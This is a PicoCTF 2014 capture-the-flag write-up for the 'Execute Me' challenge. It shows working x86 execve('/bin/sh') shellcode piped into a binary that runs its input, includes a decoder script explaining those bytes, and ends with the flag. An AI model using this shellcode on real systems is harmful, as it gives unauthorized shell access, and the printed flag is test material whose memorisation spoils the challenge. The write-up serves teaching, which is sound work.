PicoCTF 2014 Write-ups

Execute Me - 80 (Binary Exploitation)

Writeup by Oksisane

Created: 2014-11-09 13:07:47

Last modified: 2014-11-17 20:58:07

Problem

This program will run whatever you send to it! Try to get the flag! The binary can be found at /home/execute/ on the shell server. The source can be found here.

Hint

You can get the flag in a number of ways, but the easiest would be to run a shell.

Answer

Overview

Use the program to execute some shellcode.

Details

Let's start by running the program on the server. When we run it and enter /bin/sh the following appears:

pico89244@shell:~$ cd /home/execute/
pico89244@shell:/home/execute$ ./execute
/bin/sh
Segmentation fault (core dumped)
pico89244@shell:/home/execute$

Huh, that's not good. Looking a little closer at the code we see this:

read(0, buf, 128);
((function_ptr)buf)();

So the program reads up to 128 bytes of our input into a buffer and executes it. However, it does not execute the buffer the way we might expect, by passing it to system() to run a command in the shell. Instead, it executes the contents of the buffer directly as machine instructions. The hint tells us to run a shell, so we should use shellcode. Shellcode is usually written as a sequence of hex byte values that, when executed, perform a function such as running cat or /bin/sh. Many websites provide shellcode, such as shell-storm. For now, let's use this shellcode to run execve("/bin/sh"):

pico89244@shell:/home/execute$ ./execute
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
Segmentation fault (core dumped)
pico89244@shell:/home/execute$

Huh, that still didn't work. Our next task is to pipe the hex values into the program instead of typing them in. Right now, the program interprets \x31 as 4 separate ASCII characters instead of the single byte 0x31 (49 in base 10). To send the raw bytes we can use Python:

pico89244@shell:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'") | ./execute
pico89244@shell:/home/execute$
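To see what the 21 bytes piped in above actually do, here is a small decoder, added as an illustration and not part of the original write-up. The opcode table is a hand-written assumption that covers only the instructions in this one sample; it rebuilds the string pushed on the stack and reports the syscall number and interrupt vector.

```python
# The 21 shellcode bytes, copied from the write-up as a hex string.
SHELLCODE = bytes.fromhex("31c9f7e151682f2f7368682f62696e89e3b00bcd80")

# Hand-written table (an assumption of this example, not a full x86 decoder):
# opcode prefix -> (mnemonic, total instruction length in bytes).
OPCODES = {
    b"\x31\xc9": ("xor ecx, ecx", 2),   # ecx = 0 (argv = NULL)
    b"\xf7\xe1": ("mul ecx", 2),        # edx:eax = eax * 0, clears eax and edx
    b"\x51":     ("push ecx", 1),
    b"\x68":     ("push imm32", 5),
    b"\x89\xe3": ("mov ebx, esp", 2),   # ebx = pointer to the string on the stack
    b"\xb0":     ("mov al, imm8", 2),
    b"\xcd":     ("int imm8", 2),
}

def disassemble(code):
    """Return [(offset, mnemonic, raw_bytes)]; raise on unknown or truncated input."""
    out, i = [], 0
    while i < len(code):
        hit = next((v for p, v in OPCODES.items() if code.startswith(p, i)), None)
        if hit is None or i + hit[1] > len(code):
            raise ValueError("cannot decode byte 0x%02x at offset %d" % (code[i], i))
        out.append((i, hit[0], code[i:i + hit[1]]))
        i += hit[1]
    return out

def summarize(code):
    """Rebuild the stack string and return (path, value loaded into al, int vector)."""
    pushes, al, vector = [], None, None
    for _, name, raw in disassemble(code):
        if name == "push ecx":
            pushes.append(b"\x00" * 4)   # ecx was zeroed earlier in this sample
        elif name == "push imm32":
            pushes.append(raw[1:])       # immediate bytes exactly as stored in memory
        elif name == "mov al, imm8":
            al = raw[1]
        elif name == "int imm8":
            vector = raw[1]
    # The stack grows down, so the last push ends up at the lowest address.
    stack = b"".join(reversed(pushes))
    return stack.split(b"\x00")[0].decode(), al, vector

if __name__ == "__main__":
    for off, name, raw in disassemble(SHELLCODE):
        print("%2d  %-12s %s" % (off, raw.hex(), name))
    print(summarize(SHELLCODE))
```

On 32-bit Linux, value 0x0b in eax with int 0x80 selects execve, so the summary reads as execve("/bin//sh", NULL, NULL); the doubled slash pads the path to two 4-byte pushes.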

This uses Python to print our hex characters into the program (the print statement syntax used here is Python 2). Note the use of " to enclose the Python code and ' to enclose the string being printed. This time, we get no error but still no shell! The shell is successfully running with this shellcode but is exiting before we can input anything into it: once Python exits, the pipe closes and the shell reads end-of-file on its standard input. The final step here is to add a cat to the end of our Python command, which prevents this by keeping the pipe open and forwarding what we type to the shell.

pico89244@shell:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | ./execute
whoami
pico89244
cat flag.txt
shellcode_is_kinda_cool

Our shell runs successfully and we get our flag!

Flag

shellcode_is_kinda_cool